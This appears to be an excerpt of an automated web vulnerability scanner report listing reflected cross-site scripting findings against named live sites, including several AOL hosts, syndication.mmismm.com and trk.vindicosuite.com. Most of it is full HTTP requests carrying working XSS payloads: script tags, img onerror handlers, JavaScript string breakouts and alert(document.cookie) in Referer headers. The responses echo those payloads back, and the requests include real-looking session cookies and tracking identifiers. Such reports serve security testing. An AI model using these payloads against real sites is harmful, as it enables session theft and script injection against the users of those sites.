The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3ca"><script>alert(1)</script>e8a6ea52003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/?ae3ca"><script>alert(1)</script>e8a6ea52003=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa121"a%3d"b"4a36e3efe23 was submitted in the REST URL parameter 3. This input was echoed as fa121"a="b"4a36e3efe23 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/06fa121"a%3d"b"4a36e3efe23/enjoy-the-ride/ HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/06fa121"a="b"4a36e3efe23/enjoy-the-ride/"> ...[SNIP]...
1.206. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smallbusiness.aol.com
Path:
/2011/02/06/enjoy-the-ride/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3029a"><script>alert(1)</script>5a9c8cbf6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/enjoy-the-ride/?3029a"><script>alert(1)</script>5a9c8cbf6a4=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c1c"><a>d5dbf42efbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/advertising-and-marketinga5c1c"><a>d5dbf42efbb/ HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.208. http://smallbusiness.aol.com/category/advertising-and-marketing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smallbusiness.aol.com
Path:
/category/advertising-and-marketing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10cba"><script>alert(1)</script>fedb4407f14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/advertising-and-marketing/?10cba"><script>alert(1)</script>fedb4407f14=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174a7"><a>518d741443b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/money174a7"><a>518d741443b/ HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.210. http://smallbusiness.aol.com/category/money/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smallbusiness.aol.com
Path:
/category/money/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8fe7"><script>alert(1)</script>94d4958289d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/money/?e8fe7"><script>alert(1)</script>94d4958289d=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6b07"><a>43900fd15f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/starting-a-businessd6b07"><a>43900fd15f2/ HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.212. http://smallbusiness.aol.com/category/starting-a-business/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smallbusiness.aol.com
Path:
/category/starting-a-business/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06dc"><script>alert(1)</script>c0f94426d7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/starting-a-business/?b06dc"><script>alert(1)</script>c0f94426d7b=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c was submitted in the REST URL parameter 1. This input was echoed as 3ed00--><img src=a onerror=alert(1)>6108271377c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /a3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c HTTP/1.1 Host: sports.aol.com Proxy-Connection: keep-alive Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found X-RSP: 1 Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:20:49 GMT Server: AOLserver/4.0.10 Content-Type: text/html ntCoent-Length: 24927 Connection: close Content-Length: 24927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm29 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!--req:101x1_1.us.sports20.a3ed00--><img src=a onerror=alert(1)>6108271377c.broadband ad:none (recursion blocked at default(mn=0)) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96673"-alert(1)-"6a5552da2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a96673"-alert(1)-"6a5552da2b6 HTTP/1.1 Host: sports.aol.com Proxy-Connection: keep-alive Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found X-RSP: 1 Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:20:48 GMT Server: AOLserver/4.0.10 Content-Type: text/html ntCoent-Length: 24818 Connection: close Content-Length: 24818
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld30 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.sports"; s_265.trackExternalLinks="true"; s_265.prop1="a96673"-alert(1)-"6a5552da2b6"; s_265.pfxID="spr"; s_265.disablepihost=false; s_265.prop12="http://sports.aol.com/a96673\"-alert(1)-\"6a5552da2b6"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)d ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87de0</script><script>alert(1)</script>d5d06ef2b0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a HTTP/1.1 Host: sports.aol.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found X-RSP: 1 Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:19:29 GMT Server: AOLserver/4.0.10 Content-Type: text/html ntCoent-Length: 24922 Connection: close Content-Length: 24922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm02 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <"; s_265.pfxID="spr"; s_265.disablepihost=false; s_265.prop12="http://sports.aol.com/favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 was submitted in the REST URL parameter 1. This input was echoed as ee570--><img src=a onerror=alert(1)>8e55749f635 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 HTTP/1.1 Host: sports.aol.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found X-RSP: 1 Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:19:33 GMT Server: AOLserver/4.0.10 Content-Type: text/html ntCoent-Length: 24922 Connection: close Content-Length: 24922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld29 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!--req:101x1_1.us.sports20.ee570--><img src=a onerror=alert(1)>8e55749f635.broadband ad:none (recursion blocked at default(mn=0)) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d396"-alert(1)-"2e6570a7b85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /scores6d396"-alert(1)-"2e6570a7b85 HTTP/1.1 Host: sports.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2393099708.3390197069.4049274368; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:11:06 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 24843 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld03 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.sports"; s_265.trackExternalLinks="true"; s_265.prop1="scores6d396"-alert(1)-"2e6570a7b85"; s_265.pfxID="spr"; s_265.disablepihost=false; s_265.prop12="http://sports.aol.com/scores6d396\"-alert(1)-\"2e6570a7b85"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_c ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec was submitted in the REST URL parameter 1. This input was echoed as 35d9f--><img src=a onerror=alert(1)>cac995bf9ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /scores35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec HTTP/1.1 Host: sports.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2393165244.320032077.861537792; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:11:08 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 24952 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld04 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!--req:101x1_1.us.sports20.scores35d9f--><img src=a onerror=alert(1)>cac995bf9ec.broadband ad:none (recursion blocked at default(mn=0)) --> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a695d<script>alert(1)</script>02c8710ec0a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sw/a?callback=parseSLa695d<script>alert(1)</script>02c8710ec0a&sch=afc-weblogs-xml&ssch=autoblog_2009&surl=http%3A//www.autoblog.com/%3Fb6c46%2522-alert%28document.cookie%29-%25228a56f02ab0f%3D1&snum=6&of=js&rv=1.3&shints=automobile HTTP/1.1 Host: switcher.dmn.aol.com Proxy-Connection: keep-alive Referer: http://www.autoblog.com/?b6c46%22-alert(document.cookie)-%228a56f02ab0f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:28:41 GMT Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 ntCoent-Length: 3342 Content-Length: 3342
1.220. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://syndication.mmismm.com
Path:
/mmtnt.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f89'%3balert(1)//89b3aef460a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69f89';alert(1)//89b3aef460a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mmtnt.php?69f89'%3balert(1)//89b3aef460a=1 HTTP/1.1 Host: syndication.mmismm.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: G=10120000000990801741
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 21:52:52 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV" Set-Cookie: G=10120000000990801741; expires=Sun, 07-Feb-2016 03:52:52 GMT; path=/; domain=.mmismm.com Content-Length: 493 Content-Type: text/javascript
The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload d748a<script>alert(1)</script>483d9c82222 was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567d748a<script>alert(1)</script>483d9c82222&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Sun, 06 Feb 2011 20:38:11 GMT Expires: Sun, 06 Feb 2011 20:38:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDQSDSSCBB=KOKDELMCNDFPCJFLBIEHNFFB; path=/ X-Powered-By: ASP.NET Content-Length: 1000 Connection: keep-alive
The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 9f9f9<script>alert(1)</script>58e0364ee35 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=200319f9f9<script>alert(1)</script>58e0364ee35&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 